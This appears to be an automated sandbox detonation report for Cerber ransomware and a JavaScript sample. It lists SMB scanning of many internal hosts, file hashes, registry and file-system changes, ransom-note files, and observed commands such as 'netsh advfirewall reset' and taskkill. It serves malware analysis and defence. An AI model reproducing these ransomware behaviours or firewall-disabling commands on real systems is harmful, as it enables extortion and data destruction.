| N/A | 10.127.1.170:139 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| N/A | 10.127.1.171:139 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.1.172:139 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.1.173:139 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.174:139 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.175:139 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.176:139 | tcp | |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.177:139 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| N/A | 10.127.1.178:139 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.1.179:139 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| N/A | 10.127.1.180:139 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.181:139 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.1.182:139 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| N/A | 10.127.1.183:139 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.1.184:139 | tcp | |
| N/A | 10.127.1.185:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.1.185:139 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.1.186:139 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.187:139 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.188:139 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.189:139 | tcp | |
| N/A | 10.127.1.190:445 | tcp | |
| N/A | 10.127.1.190:139 | tcp | |
| N/A | 10.127.1.191:445 | tcp | |
| N/A | 10.127.1.191:139 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.1.192:445 | tcp |
Files
memory/2240-8-0x00000000001C0000-0x000000000021E000-memory.dmp
memory/2240-0-0x00000000001C0000-0x000000000021E000-memory.dmp
memory/2240-12-0x00000000001C0000-0x000000000021E000-memory.dmp
\Users\Admin\AppData\Local\Temp\1C86.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/2240-24-0x00000000001C0000-0x000000000021E000-memory.dmp
memory/2240-9-0x00000000001C0000-0x000000000021E000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240611-en
Max time kernel
1560s
Max time network
1566s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240226-en
Max time kernel
1792s
Max time network
1803s
Command Line
Signatures
Cerber
Contacts a large (1107) amount of remote hosts
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\documents | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\desktop | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp7470.bmp" | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\program files (x86)\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files\ | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\ | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\desktop | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\ | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\desktop | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___W0HPZR_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___HRXS2A6_.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2356 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
